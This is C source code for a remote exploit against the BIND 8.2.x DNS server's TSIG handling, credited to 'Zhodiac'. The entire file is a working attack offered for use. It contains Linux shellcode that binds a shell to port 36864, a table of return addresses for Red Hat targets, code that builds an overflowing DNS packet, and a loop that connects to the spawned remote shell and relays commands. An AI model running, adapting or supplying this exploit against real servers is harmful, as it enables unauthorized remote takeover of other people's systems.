/* 
* Bind remote Linux TSIG XPLOIT
* By:
* Zhodiac <zhodiac@softhome.net>
*
* Binds a shell to port 36864
*/ 
#define max(x,y) (((x)>(y))?(x):(y))

#include <arpa/nameser.h>
#include <stdio.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <string.h>

#define NS_T_TSIG 250
#define NUM_QR 3
#define NUM_ADDR 14
#define NOP 0x90
#define NUM_NOPS 61
#define TYPE 0x00000001

char linuxcode[]=
"\x1b\xeb\x78\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40"
"\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\xeb\x01\x3C\x43\xc6\x46"
"\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\xeb\x01\x2D\x86\xc3\xb0\x3f\x29\xc9"
"\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89"
"\x76\x0c\x87\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80\xe8\x83\xff\xff\xff"
"/bin/sh";

struct remote {
char *osname;
char *bindver;
unsigned long ret;
unsigned long evptr;
int pad;
char *shellcode; } 
remote[] = { 
{ "RED HAT Linux", "8.2.2-P7 from source", 0xbffffad1, 0xbffffaa5, 2, linuxcode},
{ "RED HAT Linux", "8.2.2-P5 from source", 0xbffffad1, 0xbffffaa5, 2, linuxcode },
{ "RED HAT Linux", "8.2.2-P3 from source", 0xbffffad1, 0xbffffaa5, 2, linuxcode },
{ "RED HAT Linux", "8.2.2-REL from source", 0xbffffad1,0xbffffaa5, 2, linuxcode },
{ "RED HAT Linux", "8.2.1 from source", 0xbffffad1, 0xbffffaa5, 2, linuxcode },
{ "RED HAT 6.2", "8.2.2-P5 from rpm", 0xbffffad1, 0xbffffaa5, 2, linuxcode },
{ NULL, NULL, 0, 0, 0, NULL }
};


/* JIZZ routine */
char *dnsaddlabel(char *p, char *label) {
char *p1;

while ((*label) && (label)) {
if ((*label == '.') && (!*(label+1)))
break;

p1=strchr(label,'.');

if (!p1)
p1=strchr(label,0);

*(p++)=p1-label;
memcpy(p,label,p1-label);
p+=p1-label;

label=p1;
if (*p1)
label++;
}
*(p++)=0;

return(p);
}
/* JIZZ routine */


long resolve(char *name) {
struct hostent *hp;
long ip;

if ((ip=inet_addr(name))==-1) {
if ((hp=gethostbyname(name))==NULL) {
fprintf (stderr,"Can't resolve host name [%s].\n",name);
exit(-1);
} 
memcpy(&ip,(hp->h_addr),4);
}
return(ip);
}


void usage(char *progname) {
int aux=0;

printf("Usage: %s <host> [<type>]\n\n",progname);
printf("Types:\n");

while (remote[aux].osname!=NULL) {
printf("%d) OS: \"%s\" BIND_VERSION: \"%s\"\n",aux,remote[aux].osname,remote[aux].bindver);
aux++;
}
printf("\n");

}

int proxyloop(int s) {

char snd[1024], rcv[1024];
fd_set rset;
int maxfd, n;

strcpy(snd, "cd /; uname -a; pwd; id;\n");
write(s, snd, strlen(snd));
for (;;) {
FD_SET(fileno(stdin), &rset);
FD_SET(s, &rset);
maxfd = max(fileno(stdin), s) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if (FD_ISSET(fileno(stdin), &rset)) {
bzero(snd, sizeof(snd));
fgets(snd, sizeof(snd) - 2, stdin);
write(s, snd, strlen(snd));
}
if (FD_ISSET(s, &rset)) {
bzero(rcv, sizeof(rcv));
if ((n = read(s, rcv, sizeof(rcv))) == 0)
exit(0);
if (n < 0) {
return -3;
}
fputs(rcv, stdout);
}
}
return 0;
}


int main (int argc, char *argv[]) {
char buffer[1024], buf_aux[1024],*ch_ptr, *char_ptr;
HEADER *dns;
struct sockaddr_in addr,sin;
int sock,aux;
unsigned long * long_ptr;
int *int_ptr,num=0;

printf("\nBind TSIG XPLOIT by Zhodiac <zhodiac@softhome.net>\n\n");

if (argc<2) {
usage(argv[0]);
exit(-1);
}

if (argc==3) num=atoi(argv[2]);

printf("Usign type: %d\n",num);
printf("OS: %s\n",remote[num].osname);
printf("BIND version: %s\n",remote[num].bindver);
printf("Return Address: %#x\n",remote[num].ret);
printf("EVPTR Address: %#x\n\n",remote[num].evptr);

addr.sin_family=AF_INET;
addr.sin_addr.s_addr=resolve(argv[1]);
addr.sin_port=htons(53);

if ((sock=socket(AF_INET, SOCK_DGRAM,0))<0) {
perror("socket()");
exit(-1);
}

sin.sin_family=AF_INET;
sin.sin_addr.s_addr=INADDR_ANY;
sin.sin_port=htons(7379);

if (bind(sock,(struct sockaddr*)&sin,sizeof(sin))<0) {
perror("bind()");
exit(-1);
}

memset(buffer,0,sizeof(buffer));

dns=(HEADER *)buffer;
dns->id=7379;
dns->qr=0; 
dns->arcount=htons(1);
dns->qdcount=htons(NUM_QR+2);

ch_ptr=(char *)(++dns);

for(aux=0;aux<NUM_QR;aux++) {
ch_ptr=dnsaddlabel(ch_ptr,"zhodiac.!hispahack.com"); // NAME 
PUTSHORT(T_A,ch_ptr); // TYPE 
PUTSHORT(C_IN,ch_ptr); // CLASS
}

/* Shellcode */
*ch_ptr=(char)(NUM_NOPS+2); // NAME
ch_ptr++;
int_ptr=(int *)ch_ptr;
for(aux=0;aux<5;aux++) *(int_ptr++)=TYPE;
ch_ptr=(char*)int_ptr;
memset(ch_ptr,NOP,NUM_NOPS-5*sizeof(int));
ch_ptr+=NUM_NOPS-5*sizeof(int);
*(ch_ptr++)=0xeb; // jmp to 1 bytes to bypass "." 
*(ch_ptr++)=0x01;

*ch_ptr=(char)(NUM_NOPS+2);
ch_ptr++;
memset(ch_ptr,NOP,NUM_NOPS);
ch_ptr+=NUM_NOPS;
*(ch_ptr++)=0xeb; // jmp to 1 bytes to bypass "."
*(ch_ptr++)=0x01;

memcpy(ch_ptr,remote[num].shellcode,strlen(remote[num].shellcode));
ch_ptr+=strlen(remote[num].shellcode)+1;

PUTSHORT(T_A,ch_ptr); // TYPE
PUTSHORT(C_IN,ch_ptr); // CLASS 

/* New Frame Stack */
memset(buf_aux,0,sizeof(buf_aux));
char_ptr=(char *)buf_aux;
memcpy(char_ptr,"Zhodiac.&.[CrAsH]].",19);
char_ptr+=19;
long_ptr=(unsigned long *)char_ptr;
for(aux=0;aux<NUM_ADDR;aux++) *(long_ptr++)=remote[num].ret-2*aux;
char_ptr=(char *)long_ptr;
memcpy(char_ptr,".ZHO",4);
char_ptr+=4;
long_ptr=(unsigned long *)char_ptr;
for(aux=0;aux<NUM_ADDR;aux++) {
if (aux>remote[num].pad) *(long_ptr++)=remote[num].evptr; 
else *(long_ptr++)=remote[num].ret-2*aux;
}

ch_ptr=dnsaddlabel(ch_ptr,buf_aux); // NAME
PUTSHORT(T_A,ch_ptr); // TYPE
PUTSHORT(C_IN,ch_ptr); // CLASS

ch_ptr=dnsaddlabel(ch_ptr,""); // NAME
PUTSHORT(NS_T_TSIG,ch_ptr); // TYPE
PUTSHORT(T_ANY,ch_ptr); // CLASS

if (sendto(sock,buffer,ch_ptr-(char *)buffer,0,&addr,sizeof(addr))==1) {
perror("send()");
exit(-1);
}

/* Send null bytes in order to make named leave the select loop */
if (sendto(sock,buffer,0,0,&addr,sizeof(addr))==1) {
perror("send()");
exit(-1);
}

close(sock);

printf("1.- Overflow sent!!!\n");
sleep(10);

printf("2.- Connecting to the remote shell...\n");
if ((sock=socket(AF_INET,SOCK_STREAM,0))<0) {
perror("socket()");
exit(-1);
}

addr.sin_port=htons(36864);

if (connect(sock,(struct sockaddr *)&addr,sizeof(struct sockaddr))<0) {
perror("connect()");
exit(1);
}

printf("3.- Connected!!!!!!! Entering loop :)~~~\n\n"); 

proxyloop(sock);

}